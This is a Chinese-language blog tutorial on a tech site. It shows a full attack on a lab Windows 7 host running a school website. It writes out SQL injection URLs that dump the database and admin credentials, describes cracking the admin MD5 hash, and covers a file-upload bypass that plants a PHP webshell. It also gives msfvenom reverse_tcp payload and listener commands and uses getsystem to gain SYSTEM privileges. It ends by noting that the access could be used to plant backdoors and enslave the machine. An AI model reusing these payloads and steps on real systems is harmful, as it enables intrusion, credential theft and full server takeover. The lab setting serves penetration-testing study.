资讯专栏INFORMATION COLUMN

网站攻击到提权的全部过程

leone / 3458人阅读

摘要:发现是普通用户权限,之前我们已经在观察到对方是系统,所以我们采用的是的载荷攻击我们尝试使用进行提权试试。发现直接提权成功,现在我们拥有最高权限。这告诉我们开发网站必须注重安全,否则带来的后果是无穷大的。

准备工作

靶机(被攻击方):win7系统
入侵者(攻击方):win10系统、kali系统

首先启动win7系统,搭建一个常见的校园网站,然后映射到局域网,使得我们能正常访问。

从网站拿到webshell

2021最新整理网络安全/渗透测试/安全学习/100份src技术文档(全套视频、大厂面经、精品手册、必备工具包、路线)一>获取<一

sql注入漏洞

把整个网站浏览完一遍后,我们发现这里的url为?id=10结尾,我们猜测可能是一个sql注入点。

首先我们在id=10后面加上一个单引号’进行判断。

这个时候我们发现回显的数据不正常,于是我们再加一个注释符号。

发现数据这个时候回显的时候是正常的,到这一步我们已经可以确定这里存在一个sql注入漏洞。

原理我们可以简单解释一下
在网站中,我们一般使用数据库存储网站数据,网站和数据库是存在一个交互性。网站所呈现的内容是由代码中写入的sql语句调用数据库中的内容进行一个呈现,例如我们刚刚看到的文字。
而sql注入漏洞一般是由于程序员书写的sql语句不规范所导致的安全事件。

例如网站源码中使用如下的sql语句进行查询。

给语句结尾的where查询条件加上一个单引号’。

很显然,我们传入的单引号和前面的单引号闭合,后面只有一个无法成对的单引号,然后报了语法错误。这个时候我们再加上--+注释符号注释掉后面的单引号。

这个时候查询的数据就会正确回显出来。

原理简单解释了一下之后,我们回到刚刚的网站。
这个时候我们发现存在sql注入漏洞之后,我们就开始进行查询对方网站数据库的数据,找到一些敏感信息,例如管理员的账号密码等等。

首先,我们使用order by语句快速猜解出表中的列数。

发现10列的时候报错,说明不足10列,我们继续缩小范围。

再查询第8列的时候,发现数据回显正确,说明对方表中含有列数8
我们使用union select 自定义查询测试一下,zhu意我们这里前面的id=10,要写成id=-10,把这里的查询置空。

发现会分别回显第三列、第五列和第七列。接下来我们就可以在三、五、七处做做文章。

查询数据库名字:

http://192.168.1.167/yxlink/tuku/images.php?id=-10" union select 1,2,database(),4,5,6,7,8--+

得到数据库名字:qzn_zuiai

查询数据库中的表名:

http://192.168.1.167/yxlink/tuku/images.php?id=-10" union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema="qzn_zuiai"--+

得到一共se2admin,se2fl,se2hd,se2nr,se2tufl,se2tunr,se2wz,se2zf,sj3sk九张表
通过表名,我们猜测se2admin可能是存储管理员账号和密码的表,所以我们先查询这张表中的数据

查询表se2admin中的字段:

http://192.168.1.167/yxlink/tuku/images.php?id=-10" union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name="se2admin"--+

得到表中的字段值有id,name,pass等,接下来我们查询name和pass的字段值。

查询字段值:

http://192.168.1.167/yxlink/tuku/images.php?id=-10" union select 1,2,name,4,pass,6,7,8 from se2admin--+

我们得到管理员账号:admin,管理员账号密码:7fef6171469e80d32c0559f88b377245
很显然密码值是被加密的md5值,所以我们去网上找md5网站进行撞库查询。

得到管理员密码为:admin888
接下来我们需要查找这个网站的后台地址,我们使用御剑进行一个扫描。

御剑爆出了很多敏感地址,我们找到一个admin的目录,可能是后台地址,我们去访问一下。

输入我们刚刚得到的管理员账号和密码admin:admin888。

这个时候,我们成功进入对方网站后台。

文件上传漏洞

接下来我们再这里找到一个文件上传点。

我们写一个简单的一句话木马。

考虑到这里可能会对我们上传的文件进行一个后缀限制,例如只能上传jpg或者png图片格式文件等,所以我们把muma.txt改成muma.jpg格式。

我们开启burpsuite,然后点提交,拦截到我们发送的数据包。

我们把muma.jpg改回php文件类型:muma.php。

然后发送数据包。

ok,已经上传成功,我们去找找我们上传后的路径。

得到我们的上传完整路径为:http://192.168.1.167/yxlink/img/img_3699336993.php
我们使用蚁剑进行连接我们上传的木马。

成功连接,进入到对方服务器。

到此,已成功拿到webshell。

反弹shell连接

接下来我们利用kali的msf制作一个exe类型的反弹型木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f 类型 -o 文件名

把做好的木马,通过我们蚁剑刚刚连接的webshell进行上传。

上传成功后,我们在kali启动msf。

执行监听

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.131 set lport 4444 exploit

执行木马

msf开启监听之后,我们去蚁剑webshell执行我们上传的木马。

执行之后,回到kali,我们可以看到msf目标正在回连,创建Meterpreter会话成功。

提权

首先查看一下我们的用户权限。

发现是普通用户权限,之前我们已经在webshell观察到对方是win7系统,所以我们采用的是windows的载荷攻击
我们尝试使用getsystem进行提权试试。

发现直接提权成功,现在我们拥有windows最高权限system。
接下来我们打印一下系统信息,并且拍照对方电脑现在状态。

ok,成功。

结语

在拿到system权限之后,我们可以干很多很多的事…例如给对方种下后门,拿来当肉鸡等等。。。
这告诉我们开发网站必须注重安全,否则带来的后果是无穷大的。
emmm…这波有点难受。

注:本文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本文章不承担任何法律及连带责任,请遵守中华人民共和国安全法。

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/121599.html

相关文章

  • 靶机渗透FristiLeaks1.3 ☀️新手详细☀️

    靶机FristiLeaks1.3的目录 0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. dirb目录扫描5. 网站指纹识别 二、 漏洞挖掘base64解密1. 寻找url2. 查看源码,base64解密3. 登录成功 文件上传漏洞1. 尝试修改抓包修改后缀进行绕过,失败2. 进行多后缀文件上传3. 打开上传的文件,显示出...

    RyanQ 评论0 收藏0
  • iOS冰与火之歌(番外篇) - 基于PEGASUS(Trident三叉戟)的OS X 10.11.6

    摘要:总结这篇文章介绍了如何利用三叉戟做到内核信息泄露以及内核代码执行,然后利用获取权限。另外,因为三叉戟同时存在于和,有兴趣的同学可以在我们发布的攻击代码的基础上,尝试一下攻击代码的编写。 0x00 序 这段时间最火的漏洞当属阿联酋的人权活动人士被apt攻击所使用的iOS PEGASUS(又称Trident三叉戟)0day漏洞了。为了修复该漏洞,苹果专门发布了一个iOS 9.3.5版本。这...

    imtianx 评论0 收藏0
  • MSF(1)——一次完整的渗透流程

    摘要:后渗透模块该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息实施跳板攻击等。我将通过一个完整的渗透测试来进行框架的初步讲解,这是我在一次实战中的操作,我用虚拟机进行了简单的模拟。其中,是被迁徙的进程。 ...

    abson 评论0 收藏0
  • Vulnhub靶场渗透-mrRobot

    摘要:前言靶机攻击机网络模式直接开始信息收集漏洞挖掘扫到的东西比较多,逐个看了一下,在里找到第一个,还发现一个字典其次还找到的登录页可以看看里的字典内容,拿这个字典去爆破登录页因为需要的时间比较长,就不再跑一边截图了,账号,密 ...

    Scliang 评论0 收藏0
  • 使用MSF进行提权(windows提权、linux提权、wesng使用)

    摘要:取代了老牌安全网站。不断更新大量的程序和报告,它的搜索功能可以搜索整个网站内容。为此,可以分别使用和参数,使用简写参数可以仅列出具有特定严重性的结果支持使用参数将结果以格式存储到磁盘同样也有针对的工具 ...

    android_c 评论0 收藏0

发表评论

0条评论

leone

|高级讲师

TA的文章

阅读更多
最新活动
阅读需要支付1元查看
<